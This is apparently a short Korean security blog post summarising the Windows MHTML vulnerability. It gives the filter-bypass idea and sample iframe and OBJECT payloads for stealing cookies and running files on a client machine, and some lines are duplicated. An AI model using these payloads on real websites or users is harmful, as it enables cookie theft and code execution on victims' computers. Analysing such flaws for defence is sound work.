기사를 통해서 MHTML 취약점에 대해서 접한 후, 리뷰를 급하게 작성합니다.
1. 취약 대상
Windows 사용자
Windows 사용자
2. 핵심 기법
주소에 MHTML: 첨부할 경우 여러 필터링 통과 가능
주소에 MHTML: 첨부할 경우 여러 필터링 통과 가능
3. 응용
<iframe src="MHTML:http://target/file/any.html!cookie"></iframe>
<iframe src="mhtml:http://target/file/any.html?a=header with content-type"></iframe>
or content-type의 대한 보안이 있는 경우 따로 파일에 저장 후 html에 인젝션 해서 불러온다.
<OBJECT CLASSID=CLSID:1111111-1111-1111-1111-111111111111 CODEBASE=file_path></OBJECT>
클라이언트의 파일을 실행할 수 있다.
<iframe src="MHTML:http://target/file/any.html!cookie"></iframe>
<iframe src="mhtml:http://target/file/any.html?a=header with content-type"></iframe>
or content-type의 대한 보안이 있는 경우 따로 파일에 저장 후 html에 인젝션 해서 불러온다.
<OBJECT CLASSID=CLSID:1111111-1111-1111-1111-111111111111 CODEBASE=file_path></OBJECT>
클라이언트의 파일을 실행할 수 있다.
'보안 기술 자료 (D:\) > D:\> WEB' 카테고리의 다른 글
Encoding Web Shells in PNG IDAT chunks (0) | 2015.06.16 |
---|---|
중국발 해킹의 발전과 대응 (0) | 2010.12.25 |
디렉토리 리스팅 취약점을 이용한 게임db서버 해킹사례 (0) | 2010.11.13 |
취약한 웹서버를 이용한 해킹 및 악성코드 삽입 사례 (0) | 2010.10.13 |
OWASP 웹해킹 TOP 10 (0) | 2010.08.21 |